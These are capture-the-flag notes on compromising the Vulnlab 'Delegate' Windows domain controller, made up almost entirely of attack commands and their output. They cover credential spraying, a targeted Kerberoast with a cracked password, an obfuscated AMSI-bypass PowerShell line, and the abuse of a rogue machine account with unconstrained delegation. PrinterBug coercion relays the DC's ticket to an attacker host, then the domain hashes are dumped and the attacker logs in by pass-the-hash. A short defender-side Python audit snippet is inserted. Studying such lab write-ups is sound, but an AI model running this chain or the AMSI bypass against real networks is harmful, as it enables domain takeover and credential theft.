Here are my notes on the DELEGATE box from Vulnlab.
DELEGATE: 10.10.123.175
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
bloodhound-python -c All -u A.Briggs -p 'P4ssw0rd1#123' -d delegate.vl --dns-tcp -ns 10.10.123.175
A.Briggs -> GenericWrite -> N.THOMPSON -> CanPSRemote -> DC1.DELEGATE.VL
targetedKerberoast.py NOTES: Bloodhound User1 -> GenericWrite -> USER2
https://github.com/ShutdownRepo/targetedKerberoast
python3 targetedKerberoast.py -v -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123'
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast]
└─# python3 targetedKerberoast.py -v -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$d433a16a0d864d7d4b4fa13eeca96[SNIP].
N.Thompson:KALEB_2341
Troubleshooting:
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
sudo rdate -n 10.10.123.175
ShadowCredentials Attack:
pywhisker.py -d "delegate.vl" -u "A.Briggs" -p 'P4ssw0rd1#123' --target "N.THOMPSON" --action "add"
[*] Searching for the target account
[*] Target user found: CN=N.Thompson,CN=Users,DC=delegate,DC=vl
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: e8b538dc-5c48-7fde-5921-7353c768553a
[*] Updating the msDS-KeyCredentialLink attribute of N.THOMPSON
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: dXlDJQiR.pfx
[*] Must be used with password: bI3A0fi43zF281ELeFib
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
#PKINIT DISABLED.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-26 20:25:32Z)
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# sudo impacket-GetNPUsers -no-pass -dc-ip 10.10.123.175 -usersfile usernames delegate.vl/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
-NO-ASREPROASTING.
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# sudo impacket-GetUserSPNs 'delegate.vl/A.Briggs:P4ssw0rd1#123' -dc-ip 10.10.123.175 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
No entries found!
-NO-KERBEROASTING.
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# sudo impacket-rpcdump @10.10.123.175 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# rpcclient --user="" --command=enumdomusers -N 10.10.123.175
result was NT_STATUS_ACCESS_DENIED
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# crackmapexec smb 10.10.123.175 -u guest -p ""
SMB 10.10.123.175 445 DC1 [*] Windows 10.0 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.123.175 445 DC1 [+] delegate.vl\guest:
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# crackmapexec smb 10.10.123.175 -u guest -p "" --shares
SMB 10.10.123.175 445 DC1 [*] Windows 10.0 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.123.175 445 DC1 [+] delegate.vl\guest:
SMB 10.10.123.175 445 DC1 [+] Enumerated shares
SMB 10.10.123.175 445 DC1 Share Permissions Remark
SMB 10.10.123.175 445 DC1 ----- ----------- ------
SMB 10.10.123.175 445 DC1 ADMIN$ Remote Admin
SMB 10.10.123.175 445 DC1 C$ Default share
SMB 10.10.123.175 445 DC1 IPC$ READ Remote IPC
SMB 10.10.123.175 445 DC1 NETLOGON READ Logon server share
SMB 10.10.123.175 445 DC1 SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# smbclient \\\\10.10.123.175\\IPC$ -U "guest"
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
sudo lookupsid.py Guest@10.10.123.175 | tee usernames
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# cat usernames | grep SidTypeUser |gawk -F '\' '{ print $2 }' |gawk -F ' ' '{ print $1 }' |tee usernames
Administrator
Guest
krbtgt
DC1$
A.Briggs
b.Brown
R.Cooper
J.Roberts
N.Thompson
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# smbclient \\\\10.10.123.175\\NETLOGON -U "guest"
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023
5242879 blocks of size 4096. 1917833 blocks available
smb: \> get users.bat
getting file \users.bat of size 159 as users.bat (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# smbclient \\\\10.10.123.175\\SYSVOL -U "guest"
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Sep 9 09:52:30 2023
.. D 0 Sat Aug 26 05:39:25 2023
delegate.vl Dr 0 Sat Aug 26 05:39:25 2023
-Nothing interesting other than users.bat, which is the same file as the one in NETLOGON.
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# crackmapexec smb 10.10.123.175 -u usernames -p "P4ssw0rd1#123" --continue-on-success
SMB 10.10.123.175 445 DC1 [*] Windows 10.0 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.123.175 445 DC1 [-] delegate.vl\Administrator:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\Guest:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\krbtgt:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\DC1$:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [+] delegate.vl\A.Briggs:P4ssw0rd1#123
SMB 10.10.123.175 445 DC1 [-] delegate.vl\b.Brown:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\R.Cooper:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\J.Roberts:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.10.123.175 445 DC1 [-] delegate.vl\N.Thompson:P4ssw0rd1#123 STATUS_LOGON_FAILURE
A.Briggs:P4ssw0rd1#123
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2023-09-30T15:47:02
|_Not valid after: 2024-03-31T15:47:02
| rdp-ntlm-info:
| Target_Name: DELEGATE
| NetBIOS_Domain_Name: DELEGATE
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: delegate.vl
| DNS_Computer_Name: DC1.delegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-01-26T20:25:40+00:00
|_ssl-date: 2024-01-26T20:26:19+00:00; -1s from scanner time.
5985/tcp open wsman
┌──(root㉿kali)-[/home/…/BOXES/COMP/DELEGATE/10.10.123.175]
└─# crackmapexec winrm 10.10.123.175 -u N.THOMPSON -p "KALEB_2341"
SMB 10.10.123.175 5985 DC1 [*] Windows 10.0 Build 20348 (name:DC1) (domain:delegate.vl)
HTTP 10.10.123.175 5985 DC1 [*] http://10.10.123.175:5985/wsman
WINRM 10.10.123.175 5985 DC1 [+] delegate.vl\N.THOMPSON:KALEB_2341 (Pwn3d!)
┌──(root㉿kali)-[/home/kali/BOXES/COMP/DELEGATE]
└─# evil-winrm -i 10.10.123.175 -u N.THOMPSON -p 'KALEB_2341'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami
delegate\n.thompson
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>
-USER-SHELL !
*Evil-WinRM* PS C:\Users\N.Thompson\Desktop> dir
Directory: C:\Users\N.Thompson\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/2/2023 12:53 PM 36 user.txt
*Evil-WinRM* PS C:\Users\N.Thompson\Desktop> type user.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\Users\N.Thompson\Desktop>
FLAG.TXT: VL{REDIRECTED}
PRIV ESC:
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
#WORKS !
*Evil-WinRM* PS C:\Users\N.Thompson> net group "delegation admins"
Group name delegation admins
Comment Group to allow delegation in the domain

Members

-------------------------------------------------------------------------------
J.Roberts N.Thompson
The command completed successfully.
-No-Print-Nightmare
Get-DomainUser -AllowDelegation -AdminCount
-N.Thompson
Set-ADAccountPassword J.ROBERTS -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'Password123!') -Verbose
Unconstrained Delegation With SeEnableDelegationPrivilege:
1. The user belongs to a group named "delegation admins", whose comment reads "Group to allow delegation in the domain".
2. The user also holds SeEnableDelegationPrivilege, the right that allows marking an account as trusted for delegation.
Powermad.ps1: Target (Windows)
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
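Added example (mine, not from these notes or from Powermad): a defender-side check that decodes userAccountControl values such as the 528384 set above and flags non-DC computer objects carrying TRUSTED_FOR_DELEGATION, together with the mS-DS-CreatorSID attribute that AD stamps on machine accounts created through MachineAccountQuota. The records are constructed to mirror the objects in these notes; the SID is a placeholder, and in practice the records would come from an LDAP query for objectClass=computer.

```python
# Added example, not part of the original notes or of Powermad.
# Decode userAccountControl and flag computer objects that look like the
# PWNED$ account above: unconstrained delegation on a non-DC, created via
# MachineAccountQuota by an ordinary user (mS-DS-CreatorSID is then set).

# Subset of userAccountControl bits relevant to delegation auditing.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",                # domain controllers
    0x80000: "TRUSTED_FOR_DELEGATION",             # unconstrained delegation
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",   # protocol transition
}
TRUSTED_FOR_DELEGATION = 0x80000
SERVER_TRUST_ACCOUNT = 0x2000


def decode_uac(value: int) -> list:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def audit_computers(records: list) -> list:
    """Return (sAMAccountName, reasons) for computer objects worth a closer look."""
    findings = []
    for rec in records:
        uac = rec["userAccountControl"]
        reasons = []
        # DCs legitimately carry TRUSTED_FOR_DELEGATION; other computers should not.
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            reasons.append("unconstrained delegation on a non-DC computer")
        # AD stamps mS-DS-CreatorSID when a non-privileged user consumed the quota.
        creator = rec.get("mS-DS-CreatorSID")
        if creator:
            reasons.append(f"created via MachineAccountQuota by {creator}")
        if reasons:
            findings.append((rec["sAMAccountName"], reasons))
    return findings


# Constructed sample records modelled on the objects seen in these notes.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC1$", "userAccountControl": 0x82000},   # DC, expected
    {"sAMAccountName": "PWNED$", "userAccountControl": 528384,   # 0x81000
     "mS-DS-CreatorSID": "S-1-5-21-PLACEHOLDER-1105"},          # placeholder SID
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000},   # plain workstation
]

if __name__ == "__main__":
    print(decode_uac(528384))
    for name, reasons in audit_computers(SAMPLE_COMPUTERS):
        print(name, "->", "; ".join(reasons))
```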
LINUX: HOST (KALI)
➜ krbrelayx git:(master) ✗ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.0.71 --action add DC1.delegate.vl -dns-ip 10.10.88.246
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
#As the ticket will be encrypted with keytype 23 (rc4_hmac), we need to calculate the NTLM hash of the password '12345', which is:
7A21990FCD3D759941E45C490F143D5F
https://codebeautify.org/ntlm-hash-generator
python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
➜ krbrelayx git:(master) ✗ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
#PASS:12345
#And as we can see, we got a ticket for DC1$, so we can use secretsdump to get the admin hash:
export KRB5CCNAME=/home/kali/Kali-Tools/krbrelayx/'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache'
export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
secretsdump.py -k DC1.delegate.vl -just-dc-ntlm
secretsdump.py -k DC1.delegate.vl -just-dc-user Administrator
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f877adcb278c4e178c430440573528db38631785a0afe9281d0dbdd10774848c
Administrator:aes128-cts-hmac-sha1-96:3a25aca9a80dfe5f03cd03ea2dcccafe
Administrator:des-cbc-md5:ce257f16ec25e59e
[*] Cleaning up...
MachineAccountQuota is USEFUL Sometimes: Exploiting One of Active Directory's Oddest Settings
https://github.com/Kevin-Robertson/Powermad
https://medium.com/m/global-identity-2?redirectUrl=https%3A%2F%2Fsystemweakness.com%2Fvulnlab-delegate-9b1272cd4a98
https://pr0m0ly.github.io/docs/VulnLab/Delegate/
https://medium.com/@arz101/vulnlab-delegate-dde0a396f504
┌──(root㉿kali)-[/home/kali/Kali-Tools/krbrelayx]
└─# evil-winrm -i 10.10.88.246 -u Administrator -H 'c32198ceab4cc695e65045562aa3ee93'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
delegate\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
ADMINISTRATOR SHELL !
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/2/2023 12:52 PM 36 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
FLAG.TXT: VL{REDIRECTED}
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49672/tcp open unknown
49673/tcp open unknown
49683/tcp open unknown
49688/tcp open unknown
49692/tcp open unknown
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-26T20:25:40
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required